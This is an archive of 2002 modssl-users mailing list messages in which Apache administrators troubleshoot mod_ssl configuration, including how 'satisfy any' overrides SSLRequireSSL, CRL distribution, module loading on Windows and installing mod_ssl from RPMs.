Date: Tue, 4 Jun 2002 20:32:52 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: phil@netroedge.com
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
cc: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: SSLRequireSSL Circumvention
In-Reply-To: <20020604165922.E26788@Stimpy.netroedge.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 4 Jun 2002 phil@netroedge.com wrote:

> SSLRequireSSL
> DirectoryIndex index.wp2
> AddHandler cgi-script .cgi
> Options +ExecCGI
> deny from all
> AuthType Basic
> AuthUserFile /yadda/yadda/path/to/site/root/admin/.htpasswd
> AuthName "Administrative Pages"
> require valid-user
> satisfy any
>
> BUT, I still get the page in the browser!  Weird.  I can reload it,
> punch in the URL for a new page (which isn't cached), etc.  I tried
> this on a couple different client computers to be sure.
> Now, I can get the expected result if I comment out the 'deny from
> all' and 'satisfy any' lines.  So, I'm OK now.  Logs look right, and
> the browser is refused on port 80 for the admin area, as expected.

That's not a bug, it's a feature.  mod_ssl acts as an access checker for
SSLRequireSSL just like both mod_access and mod_auth.  "satisfy any" means
that if any of the access checkers is satisfied, then access is allowed.
Presumably your browser either has the password for mod_auth cached or
you've typed it in again.  In that case, mod_auth's "require valid-user"
condition is satisfied, so access is granted.  If mod_auth's requirement
failed, access would still be granted as long as the connection was SSL.
The "deny from all" is useless here since it can never be satisfied.

Bottom line: I don't think you should be using "satisfy any" given the
configuration above.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 02:42:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA18341; Wed, 5 Jun 2002 02:41:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id CAA18336; Wed, 5 Jun 2002 02:40:52 +0200 (MET DST)
Received: from node7.unix.virginia.edu by mail.virginia.edu id aa28238;
          4 Jun 2002 20:40 EDT
Received: from localhost (jcw5q@localhost)
	by node7.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id UAA16880;
	Tue, 4 Jun 2002 20:39:12 -0400
X-Authentication-Warning: node7.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Tue, 4 Jun 2002 20:39:12 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: phil@netroedge.com
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
cc: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: SSLRequireSSL Circumvention
In-Reply-To: <20020604165922.E26788@Stimpy.netroedge.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 4 Jun 2002 phil@netroedge.com wrote:

> BTW- I originally put in the 'deny from all' and 'satisfy any' lines
> because I had another line 'allow from .my-domain.com' inbetween them
> at one point.  Which makes me wonder, what would I do if I wanted to
> put it back in?

Ah, forgot to respond to this part.  If you want that, then you would
obviously have to use 'satisfy any'.  And in that case, you can't use
SSLRequireSSL.  You can use a RewriteRule to get the same effect.

It probably wouldn't hurt to have this mentioned in the docs, I agree.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 02:52:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA18778; Wed, 5 Jun 2002 02:51:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Stimpy.netroedge.com id CAA18752; Wed, 5 Jun 2002 02:50:15 +0200 (MET DST)
Received: (from phil@localhost)
	by Stimpy.netroedge.com (8.11.1/8.11.1) id g550peu29707;
	Tue, 4 Jun 2002 17:51:40 -0700
Date: Tue, 4 Jun 2002 17:51:40 -0700
From: phil@netroedge.com
To: Cliff Woolley 
Cc: modssl-users@modssl.org
Subject: Re: SSLRequireSSL Circumvention
Message-ID: <20020604175140.F26788@Stimpy.netroedge.com>
References: <20020604165922.E26788@Stimpy.netroedge.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: ; from jwoolley@apache.org on Tue, Jun 04, 2002 at 08:32:52PM -0400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: phil@netroedge.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Yeah, I zapped the 'satisfy any' and 'deny from all' which made the
server act as expected.  I think your explaination of the behavior is
correct. 

I'm still not understanding how this action is understandable from the
documentation for SSLRequireSSL, nor the fact that the logs are saying
'access failed' when clearly it hasn't?  The documentation and the
logging seems to state a strict enforcement, although it seems to not
be under some conditions.

Nor, out of curiousity, how I might configure it if I wanted some
logic like this:  SSL connection AND (password auth OR domain match) 

Thanks for the reply and explaination, btw!


Phil

On Tue, Jun 04, 2002 at 08:32:52PM -0400, Cliff Woolley wrote:
> On Tue, 4 Jun 2002 phil@netroedge.com wrote:
> 
> > SSLRequireSSL
> > DirectoryIndex index.wp2
> > AddHandler cgi-script .cgi
> > Options +ExecCGI
> > deny from all
> > AuthType Basic
> > AuthUserFile /yadda/yadda/path/to/site/root/admin/.htpasswd
> > AuthName "Administrative Pages"
> > require valid-user
> > satisfy any
> >
> > BUT, I still get the page in the browser!  Weird.  I can reload it,
> > punch in the URL for a new page (which isn't cached), etc.  I tried
> > this on a couple different client computers to be sure.
> > Now, I can get the expected result if I comment out the 'deny from
> > all' and 'satisfy any' lines.  So, I'm OK now.  Logs look right, and
> > the browser is refused on port 80 for the admin area, as expected.
> 
> That's not a bug, it's a feature.  mod_ssl acts as an access checker for
> SSLRequireSSL just like both mod_access and mod_auth.  "satisfy any" means
> that if any of the access checkers is satisfied, then access is allowed.
> Presumably your browser either has the password for mod_auth cached or
> you've typed it in again.  In that case, mod_auth's "require valid-user"
> condition is satisfied, so access is granted.  If mod_auth's requirement
> failed, access would still be granted as long as the connection was SSL.
> The "deny from all" is useless here since it can never be satisfied.
> 
> Bottom line: I don't think you should be using "satisfy any" given the
> configuration above.
> 
> --Cliff

-- 
Philip Edelbrock -- IS Manager -- Edge Design, Corvallis, OR
   phil@netroedge.com -- http://www.netroedge.com/~phil
 PGP F16: 01 D2 FD 01 B5 46 F4 F0  3A 8B 9D 7E 14 7F FB 7A
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 04:49:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA23665; Wed, 5 Jun 2002 04:48:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id EAA23621; Wed, 5 Jun 2002 04:47:21 +0200 (MET DST)
Received: (qmail 19112 invoked from network); 5 Jun 2002 14:47:17 +1200
Received: from venus.trimble.co.nz (155.63.248.20)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 5 Jun 2002 14:47:17 +1200
Received: (qmail 13861 invoked by uid 403); 5 Jun 2002 14:47:16 +1200
Received: from jhaar@trimble.co.nz by venus.trimble.co.nz by uid 400 with qmail-scanner-1.12 (trophie: 5.500-0829/275/46514. sophie: 2.10/3.57. spamassassin: 2.x. . Clear:. Processed in 0.750624 secs); 05 Jun 2002 02:47:16 -0000
Received: from crom.trimble.co.nz (155.63.248.198)
  by venus.trimble.co.nz with SMTP; 5 Jun 2002 14:47:12 +1200
Received: (qmail 15138 invoked by uid 500); 5 Jun 2002 02:47:12 -0000
Date: Wed, 5 Jun 2002 14:47:12 +1200
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Details on how to run a CRL?
Message-ID: <20020605024712.GB29470@trimble.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.99i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We are looking at using Client Certs via an internal CA as a cheap way of
strong authentication (SecurID costs are killing us!)

Obviously we'll have to introduce processes by which leaving staff have
their certs revoked, and have quick turnaround on revoking certs when a user
reports them lost (yeah, right... :-/)

Anyway, I can't think of a way of getting the server to check revocations
other than uploading the crl.pem hourly/daily from the CA to each SSL
server. This is possible, but I wondered if there is a better way of doing
it, or is that how this is meant to be done? I mean, that doesn't look like
it'd scale very well...

If that is true, can I imply from this that revocation checks basically
aren't done on the Internet today? 


-- 
Cheers

Jason Haar

Information Security Manager
Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 05:21:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA25616; Wed, 5 Jun 2002 05:20:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inzen.com id FAA25591; Wed, 5 Jun 2002 05:19:43 +0200 (MET DST)
Received: from isengard (sslproxy.anonymous [10.4.1.102])
	(authenticated)
	by mail.inzen.com (8.11.6/8.11.6) with ESMTP id g553NTl14179
	for ; Wed, 5 Jun 2002 12:23:29 +0900
From: "Han,Donghoon" 
To: 
Subject: RE: SSLRequireSSL Circumvention
Date: Wed, 5 Jun 2002 12:19:45 +0900
Message-ID: <000001c20c3f$d7e24b40$0113030a@isengard>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
In-Reply-To: <20020604175140.F26788@Stimpy.netroedge.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Han,Donghoon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Just remove the 'satisfy any' line and try it again.
This worked on my server.


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of phil@netroedge.com
Sent: Wednesday, June 05, 2002 9:52 AM
To: Cliff Woolley
Cc: modssl-users@modssl.org
Subject: Re: SSLRequireSSL Circumvention


Yeah, I zapped the 'satisfy any' and 'deny from all' which made the
server act as expected.  I think your explaination of the behavior is
correct. 

I'm still not understanding how this action is understandable from the
documentation for SSLRequireSSL, nor the fact that the logs are saying
'access failed' when clearly it hasn't?  The documentation and the
logging seems to state a strict enforcement, although it seems to not
be under some conditions.

Nor, out of curiousity, how I might configure it if I wanted some
logic like this:  SSL connection AND (password auth OR domain match) 

Thanks for the reply and explaination, btw!


Phil

On Tue, Jun 04, 2002 at 08:32:52PM -0400, Cliff Woolley wrote:
> On Tue, 4 Jun 2002 phil@netroedge.com wrote:
> 
> > SSLRequireSSL
> > DirectoryIndex index.wp2
> > AddHandler cgi-script .cgi
> > Options +ExecCGI
> > deny from all
> > AuthType Basic
> > AuthUserFile /yadda/yadda/path/to/site/root/admin/.htpasswd
> > AuthName "Administrative Pages"
> > require valid-user
> > satisfy any
> >
> > BUT, I still get the page in the browser!  Weird.  I can reload it,
> > punch in the URL for a new page (which isn't cached), etc.  I tried
> > this on a couple different client computers to be sure.
> > Now, I can get the expected result if I comment out the 'deny from
> > all' and 'satisfy any' lines.  So, I'm OK now.  Logs look right, and
> > the browser is refused on port 80 for the admin area, as expected.
> 
> That's not a bug, it's a feature.  mod_ssl acts as an access checker
for
> SSLRequireSSL just like both mod_access and mod_auth.  "satisfy any"
means
> that if any of the access checkers is satisfied, then access is
allowed.
> Presumably your browser either has the password for mod_auth cached or
> you've typed it in again.  In that case, mod_auth's "require
valid-user"
> condition is satisfied, so access is granted.  If mod_auth's
requirement
> failed, access would still be granted as long as the connection was
SSL.
> The "deny from all" is useless here since it can never be satisfied.
> 
> Bottom line: I don't think you should be using "satisfy any" given the
> configuration above.
> 
> --Cliff

-- 
Philip Edelbrock -- IS Manager -- Edge Design, Corvallis, OR
   phil@netroedge.com -- http://www.netroedge.com/~phil
 PGP F16: 01 D2 FD 01 B5 46 F4 F0  3A 8B 9D 7E 14 7F FB 7A
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 09:35:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA09889; Wed, 5 Jun 2002 09:34:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id JAA09848; Wed, 5 Jun 2002 09:33:49 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 9C3B3BD2C; Wed,  5 Jun 2002 09:33:54 +0200 (CEST)
Date: Wed, 5 Jun 2002 09:33:54 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Details on how to run a CRL?
Message-ID: <20020605073354.GA18665@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <20020605024712.GB29470@trimble.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020605024712.GB29470@trimble.co.nz>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jun 05, 2002 at 02:47:12PM +1200, Jason Haar wrote:
> We are looking at using Client Certs via an internal CA as a cheap way of
> strong authentication (SecurID costs are killing us!)
> 
> Obviously we'll have to introduce processes by which leaving staff have
> their certs revoked, and have quick turnaround on revoking certs when a user
> reports them lost (yeah, right... :-/)
> 
> Anyway, I can't think of a way of getting the server to check revocations
> other than uploading the crl.pem hourly/daily from the CA to each SSL
> server. This is possible, but I wondered if there is a better way of doing
> it, or is that how this is meant to be done? I mean, that doesn't look like
> it'd scale very well...

Depending on exactly how many certs you're expecting to expire, this should
still work fine for a couple of thousand users. I suppose you could even remove
certs from the crl once they've expired (since they will still be rejected).
As an alternative you could use http://authzldap.othello.ch/
> 
> If that is true, can I imply from this that revocation checks basically
> aren't done on the Internet today? 
> 
No.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 12:13:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA24825; Wed, 5 Jun 2002 12:12:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id MAA24639; Wed, 5 Jun 2002 12:11:40 +0200 (MET DST)
Message-Id: <200206051011.MAA24639@opensource.ee.ethz.ch>
Received: from WorldClient [127.0.0.1]
	by sitesontesting.com [127.0.0.1]
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Wed, 05 Jun 2002 15:46:04 +0530
Date: Wed, 05 Jun 2002 15:45:53 +0530
From: "Prachait Saxena" 
To: modssl-users@modssl.org
Subject: Apache 1.3.24 and LoadModule  ???
X-Mailer: WorldClient 5.0.5
X-MDRemoteIP: 127.0.0.1
X-Return-Path: subscription@sitesontesting.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Prachait Saxena" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I am using Apache/1.3.24 (Win32) Under Win98.
I am trying to load modules for SSL or PHP or MySql through LoadModule.

I have these lines in httpd.conf

LoadModule ssl_module   modules/libssl.dll [For SSL]
Or
LoadModule php4_module modules/libphp4.dll [For PHP]

Or I try to load another module. 
While strating the server,I am getting an error as:

Syntax Error on Line 203 of c:/apache/cong/httpd.conf
cannot load c:/apache/modules/***NewAddedModuleName [.dll or .so file]
***into server 
One of the library files needed to run the application cannot be found:


Can any tell me why this is happning? What else i have to do for this?
I already docs. but did not found any solution.

Thanks in advance.

Bye and Have a nice day 

Prachait Saxena

WebMaster
SitesOnTesting.Com

If you do for other's !
Other's will do for you !!

Visit me at http://www.sitesontesting.com/prachait


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 12:39:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA26658; Wed, 5 Jun 2002 12:38:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail1.tpgi.com.au id MAA26642; Wed, 5 Jun 2002 12:38:07 +0200 (MET DST)
Received: from hal (nme3-56k-129.tpgi.com.au [202.7.205.129])
	by mail1.tpgi.com.au (8.11.6/8.11.6) with SMTP id g55Ac4L08286
	for ; Wed, 5 Jun 2002 20:38:04 +1000
Message-ID: <004c01c20c7d$5be254c0$81cd07ca@hal>
From: "Josh Edwards" 
To: 
Subject: ssl configuration
Date: Wed, 5 Jun 2002 20:40:06 +1000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0049_01C20CD1.2D0FBEE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Josh Edwards" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0049_01C20CD1.2D0FBEE0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I have a test server running apache1.3 / unix with php and a test
certificate. I
want to configure the server to serve my pages under /htdocs/secure/ dir
using SSL only and allow the remainder of the web tree to be served =
without using
SSL. My normal port listens to 52950 and my ssl port listens to 42950.

Is this close

SSLDisable

   *****should the ssl  port be mentioned here=20
   SSLenable
   SSl RequireSSl
               =20

Any help would be appreciated




------=_NextPart_000_0049_01C20CD1.2D0FBEE0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









I have a test=20
server running apache1.3 / unix with php and a test
certificate. =
I
want to=20
configure the server to serve my pages under /htdocs/secure/ =
dir
using=20
SSL only and allow the remainder of the web tree to be served without=20
using
SSL. My normal port listens to 52950 and my ssl port listens=20
to 42950.


 


Is this close


 


SSLDisable


 


 <VirtualHost ../secure>  *****should the =
ssl  port=20
be mentioned here 


   SSLenable


   =
SSl RequireSSl


</virtualhost>       &n=
bsp;       =20


Any help would be=20
appreciated




------=_NextPart_000_0049_01C20CD1.2D0FBEE0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 12:48:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA27280; Wed, 5 Jun 2002 12:47:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id MAA27251; Wed, 5 Jun 2002 12:47:09 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g55Akmr02718
	for ; Wed, 5 Jun 2002 11:46:53 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 5 Jun 2002 11:46:44 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F0206716C@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Installing ModSSL Question
Date: Wed, 5 Jun 2002 11:46:43 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C20C7E.48140780"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C20C7E.48140780
Content-Type: text/plain;
	charset="iso-8859-1"

You have two other options (at least).
 
1. Download the Apache-mod_ssl rpm from http://www.modssl.org/contrib/
 
2. Upgrade to RedHat 7.0 or above, as this comes with it.
 
Either way, keep a backup of your httpd.conf file, just in case.
 
- 
John Airey 
Internet systems support officer, ITCSD, Royal National Institute of the
Blind, 
Bakewell Road, Peterborough PE2 6XU, 
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If Charles Darwin knew a fraction of what scientists know today, he'd never
have written the Origin of the Species. 

-----Original Message-----
From: Don [mailto:don@lclcan.com]
Sent: 04 June 2002 15:41
To: modssl-users@modssl.org
Subject: Installing ModSSL Question


Hi,
 
I'm new to this so please bare with me.  I am running RedHat Linux 6.2 with
Apache 1.3.22 and OpenSSL 0.9.6d.  I wish to install ModSSL so that I can
secure my web site.
 
I have downloaded the mod_ssl-2.8.5-1.3.22 tarball from the web site.  Upon
reading the documentation, I find that I need to recompile apache with
additional configuration options in order to install ModSSL.
 
Here is my dilemma.  I never compiled Apache from source but rather
installed from rpm packages.  Therefore, there doesn't seem to be any way I
can install ModSSL.  I've looked at the FAQ but can see no hints on
installing ModSSL once Apache is installed.  Neither have I found and ModSSL
rpm package.
 
I DON'T want to download the Apache tarball and compile/install if I can
help it because RedHat is a bit screwy as it uses it's own directories.
Installing Apache from the tarball will undoubtedly mess up my system as it
will install in other directories and confuse the hell out of me.
 
Do I have other options?
 
Thanks,
Don


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.


------_=_NextPart_001_01C20C7E.48140780
Content-Type: text/html;
	charset="iso-8859-1"











You 
have two other options (at least).


 


1. 
Download the Apache-mod_ssl rpm from http://www.modssl.org/contrib/


2. 
Upgrade to RedHat 7.0 or above, as this comes with it.


 


Either 
way, keep a backup of your httpd.conf file, just in case.


 


- 
John Airey 
Internet 
systems support officer, ITCSD, Royal National Institute of the Blind, 

Bakewell Road, Peterborough PE2 6XU, 

Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 
John.Airey@rnib.org.uk 




If Charles Darwin knew a fraction of what scientists 
know today, he'd never have written the Origin of the Species. 




  
-----Original Message-----
From: Don 
  [mailto:don@lclcan.com]
Sent: 04 June 2002 15:41
To: 
  modssl-users@modssl.org
Subject: Installing ModSSL 
  Question


  
Hi,

  
 

  
I'm new to this so please bare with me.  I 
  am running RedHat Linux 6.2 with Apache 1.3.22 and OpenSSL 0.9.6d.  I 
  wish to install ModSSL so that I can secure my web site.

  
 

  
I have downloaded the mod_ssl-2.8.5-1.3.22 
  tarball from the web site.  Upon reading the documentation, I find that I 
  need to recompile apache with additional configuration options in order to 
  install ModSSL.

  
 

  
Here is my dilemma.  I never compiled Apache 
  from source but rather installed from rpm packages.  Therefore, there 
  doesn't seem to be any way I can install ModSSL.  I've looked at the FAQ 
  but can see no hints on installing ModSSL once Apache is installed.  
  Neither have I found and ModSSL rpm package.

  
 

  
I DON'T want to download the Apache tarball and 
  compile/install if I can help it because RedHat is a bit screwy as it uses 
  it's own directories.  Installing Apache from the tarball will 
  undoubtedly mess up my system as it will install in other directories and 
  confuse the hell out of me.

  
 

  
Do I have other options?

  
 

  
Thanks,

  
Don





- 





NOTICE: The information contained in this email and any attachments is 



confidential and may be legally privileged. If you are not the 



intended recipient you are hereby notified that you must not use, 



disclose, distribute, copy, print or rely on this email's content. If 



you are not the intended recipient, please notify the sender 



immediately and then delete the email and any attachments from your 



system.





RNIB has made strenuous efforts to ensure that emails and any 



attachments generated by its staff are free from viruses. However, it 



cannot accept any responsibility for any viruses which are 



transmitted. We therefore recommend you scan all attachments.





Please note that the statements and views expressed in this email 



and any attachments are those of the author and do not necessarily 



represent those of RNIB.





RNIB Registered Charity Number: 226227





Website: http://www.rnib.org.uk 





14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it.




------_=_NextPart_001_01C20C7E.48140780--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 15:56:01 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA10042; Wed, 5 Jun 2002 15:54:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from lisboa.psmi.com.br id PAA10001; Wed, 5 Jun 2002 15:53:48 +0200 (MET DST)
Received: (qmail 6683 invoked from network); 5 Jun 2002 13:53:46 -0000
Received: from alaska.psmi.intranet (HELO mailhub.psmi.com.br) (192.168.254.139)
  by lisboa.psmi.intranet with SMTP; 5 Jun 2002 13:53:46 -0000
Received: (qmail 5140 invoked from network); 5 Jun 2002 13:53:45 -0000
Received: from unknown (HELO edgard) (172.16.2.47)
  by alaska.psmi.intranet with SMTP; 5 Jun 2002 13:53:45 -0000
Message-ID: <00e001c20c98$67849660$2f0210ac@psmi.intranet>
From: "Edgard Janzen" 
To: 
Subject: client authentication
Date: Wed, 5 Jun 2002 10:53:43 -0300
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00DD_01C20C7F.422FBD40"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edgard Janzen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00DD_01C20C7F.422FBD40
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

i=B4m trying to use Client Authentication with certificates... so I=B4m =
using
apache_1.3.22
mod_ssl_2.8.5-1.3.22
openssl-0.9.6c

and the apache configurations is like this


    ServerAdmin suporte@psmi.com.br
    DocumentRoot /home/www-data/443.psmi.com.br
    ServerName 443.psmi.com.br
    ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
    LogLevel warn
    ErrorLog /home/log-data/443.psmi.com.br-error_log
    CustomLog /home/log-data/443.psmi.com.br-access_log common
    CustomLog /home/log-data/443.psmi.com.br-referer_log referer
    CustomLog /home/log-data/443.psmi.com.br-agent_log agent
    ProxyPass / http://172.16.2.159:8080/443/
    ProxyPassReverse / http://172.16.2.159:8080/443/
    ProxyPass /misc_ http://172.16.2.159:8080/misc_
    ProxyPass /p_ http://172.16.2.159:8080/p_
    ProxyVia on
SSLEngine on
SSLCertificateFile /usr/local/apache-ssl/conf/chaves443/public.crt
SSLCertificateKeyFile =
/usr/local/apache-ssl/conf/chaves443/secureprivate.key
SSLCACertificatePath /usr/local/apache-ssl/conf/chaves443/
SSLCACertificateFile /usr/local/apache-ssl/conf/chaves443/unicert.cer
